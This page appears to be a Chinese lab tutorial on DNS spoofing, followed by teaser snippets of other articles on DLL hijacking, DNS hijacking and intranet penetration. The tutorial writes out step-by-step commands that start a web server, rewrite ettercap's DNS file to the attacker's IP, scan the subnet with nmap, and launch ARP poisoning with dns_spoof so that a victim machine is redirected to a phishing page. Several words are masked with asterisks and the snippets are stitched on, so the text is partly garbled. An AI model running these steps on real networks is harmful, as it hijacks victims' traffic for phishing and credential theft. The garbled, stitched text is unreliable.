dns欺騙,被攻擊的主機訪問任意**的回被轉到特定的釣魚**,
實驗工具:
kali linux 黑客機
win10 肉雞
apache2
ettercap
操作步驟
1,開啟kali上的apache2服務,
@kali:~# service apache2 start
root@kali:~# service apache2 status
綠點就是已經開啟了。
2,製作網頁,釣魚網頁不回做,就隨便做了乙個,命令如下
3,修改ettercap dns檔案;
ot@kali:~# vim /etc/ettercap/etter.dns
a 192.168.1.112 (黑客機ip位址)
4,尋找目標ip
kali:~# nmap -sp 192.168.1.1-255
5,發起欺騙
kali:~# ettercap -i eth0 -t -p dns_spoof -m arp /192.168.1.132///
ip位址是被攻擊的主機,
6,被攻擊的主機訪問任意**的回被劫持,
從內網滲透來理解dll劫持的工具
dll劫持 以前學過 但是並沒有注意過 但是這一天在web手的啟發下 發現 dll劫持在內網滲透裡面的許可權維持使用率還是挺高的,看來不能小看老技術啊 一開始我的想法是 修改exe 然後直接替換exe dll 查詢的順序就不說了 這裡就了解到三個工具 以及他們的思路 發現學習了不少 第乙個是 rat...
DNS劫持 流量劫持,HTTP HTTPS劫持
dns劫持 dns劫持就是通過劫持了dns伺服器,通過某些手段取得某網域名稱的解析記錄控制權,進而修改此網域名稱的解析結果,導致對該網域名稱的訪問由原ip位址轉入到修改後的指定ip,其結果就是對特定的 不能訪問或訪問的是假 從而實現竊取資料或者破壞原有正常服務的目的。dns劫持通過篡改dns伺服器上...
內網滲透 內網滲透測試基礎 1
內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...